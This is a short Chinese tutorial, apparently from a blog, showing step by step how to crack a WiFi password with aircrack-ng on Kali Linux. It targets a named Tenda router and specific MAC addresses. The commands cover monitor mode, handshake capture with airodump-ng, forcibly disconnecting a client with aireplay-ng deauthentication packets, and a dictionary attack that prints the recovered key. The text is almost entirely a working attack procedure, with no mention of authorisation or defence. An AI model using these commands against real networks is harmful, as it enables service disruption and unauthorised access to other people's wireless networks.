赞
踩
airmon-ng
看一下kali是否连接上网卡
ifconfig
有说明网卡与kali连接成功
airmon-ng check kill
airmon-ng start wlan0
ifconfig
网卡名可能会变成wlan0mon,因为这里没有变,后续继续使用wlan0
airodump-ng wlan0
扫描出WiFi后,按空格停止扫描 ,然后再按Ctrl+c退出扫描
BSSID:路由器的MAC地址
CH:信道
ESSID:WIFI的名称
这里的爆破目标为:Tenda_DAF000
airodump-ng -w <扫描结果保存的文件名> -c <信道> --bssid <路由器MAC地址> <处于监听模式的网卡名称>
airodump-ng -w kali -c 2 --bssid CC:2D:21:DA:F0:00 wlan0
-w:指定握手包存放的位置,或名称
-c:指定信道
--bssid:指定路由器MAC地址
BSSID:路由器MAC地址
STATION:客户端MAC地址
按CTRL+c停止扫描
断开其他设备与此WiFi的连接,从而让设备请求再次与路由器握手,得到握手包
打开新的终端输入以下命令:
aireplay-ng -0 <反认证包次数> -a <路由器MAC地址> -c <客户端MAC地址> <处于监听模式的网卡名称>
aireplay-ng -0 2 -a CC:2D:21:DA:F0:00 -c B2:52:2A:6B:DF:16 wlan0
回车后会发出2个包
将下载好的字典放到kali的 /root目录下
ls
kali-01.cap为握手包
wifi.txt为密码字典
aircrack-ng -w 密码字典 <包含握手包的 cap 文件>
aircrack-ng -w wifi.txt kali-*.cap
-w:指定密码字典
KEY FOUND!后面的为WIFI密码
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。